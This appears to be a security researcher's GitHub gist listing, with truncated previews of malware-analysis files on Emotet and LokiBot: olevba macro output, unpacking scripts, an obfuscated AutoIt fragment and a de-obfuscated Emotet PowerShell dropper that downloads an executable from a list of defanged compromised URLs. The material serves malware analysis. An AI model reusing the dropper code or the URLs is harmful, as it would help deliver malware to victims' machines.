Irshad Muhammad irshadqemu
irshadqemu
/ Data download
Last active
January 10, 2018 18:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kg download -u <username> -p <password> -c planet-understanding-the-amazon-from-space |
irshadqemu
/ a.ipynb
Last active
January 8, 2021 16:38
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
irshadqemu
/ file.au3
Created
February 5, 2020 14:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 29$A3560804E16 = A2B00000233($OS[1]), $A4B60A04F1C = A2B00000233($OS[2]), $A3A60C03143 = A2B00000233($OS[3]), $A3360E01054 = A2B00000233($OS[4]), $A1070005C36 = A2B00000233($OS[5]), $A2C70204F5F = A2B00000233($OS[6]), $A5A7040361D = A2B00000233($OS[7]), $A5870605460 = A2B00000233($OS[8]), $A567080112D = A2B00000233($OS[9]), $A5670D0410E = A2B00000233($OS[10]), $A5E80205900 = A2B00000233($OS[11]), $A4580403500 = A2B00000233($OS[12]), $A5D80603E25 = A2B00000233($OS[13]), $A3580801732 = A2B00000233($OS[14]), $A5480A0022D = A2B00000233($OS[15]), $A2F80C00D40 = A2B00000233($OS[16]), $A2580E03701 = A2B00000233($OS[17]), $A639000454B = A2B00000233($OS[18]), $A0E90203930 = A2B00000233($OS[19]), $A5990405F41 = A2B00000233($OS[20]), $A0C9060335F = A2B00000233($OS[21]), $A079080083C = A2B00000233($OS[22]), $A3690A02A2A = A2B00000233($OS[23]), $A5890C04F61 = A2B00000233($OS[24]), $A1590E03C19 = A2B00000233($OS[25]), $A54A0002952 = A2B00000233($OS[26]), $A07A0201025 = A2B00000233($OS[27]), $A2DA0400532 = A2B00000233($OS[2 |
irshadqemu
/ charge_07.20.vbs
Created
November 15, 2020 14:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ olevba.exe charge_07.20.doc | |
| olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: charge_07.20.doc | |
| Type: OpenXML | |
| Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'. | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
irshadqemu
/ emotet.vbs
Created
November 15, 2020 20:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: emotet.doc | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- |
irshadqemu
/ unpack_emotet.py
Last active
January 8, 2021 16:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Name: | |
| # unpack_emotet.py | |
| # Description: | |
| # This script accompanies my blog at | |
| # https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/ | |
| # and can be used to statically unpack given sample in the blog | |
| # Author: | |
| # https://twitter.com/mirshadx | |
| # https://www.linkedin.com/in/irshad-muhammad-3020b0a5/ |
irshadqemu
/ de-obfuscated-ps.ps1
Created
November 22, 2020 20:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $jrFhA0='Wf1rHz' | |
| $uUMMLI = '284' | |
| $iBtj49N='ThMqW8s0' | |
| $FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe' | |
| $S9GzRstM='EFCwnlGz' | |
| $u8UAr3=&('new-object') NeT.wEBClIEnt | |
| $pLjBqINE='http[:]//blockchainjoblist[.]com/wp-admin/014080/ | |
| @ https[:]//womenempowermentpakistan[.]com/wp-admin/paba5q52/ | |
| @ https[:]//atnimanvilla[.]com/wp-content/073735/ | |
| @ https[:]//yeuquynhnhai[.]com/upload/41830/ |
irshadqemu
/ unpack_3rdstage_lokibot.py
Created
January 4, 2021 10:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| from itertools import cycle | |
| SERVER_RESPONSE_FIE = "server_response.txt" | |
| XOR_KEY = b"ZKkz8PH0" | |
| with open(SERVER_RESPONSE_FIE) as serverfd: | |
| resp_str = serverfd.read() | |
| resp_str = resp_str[::-1] |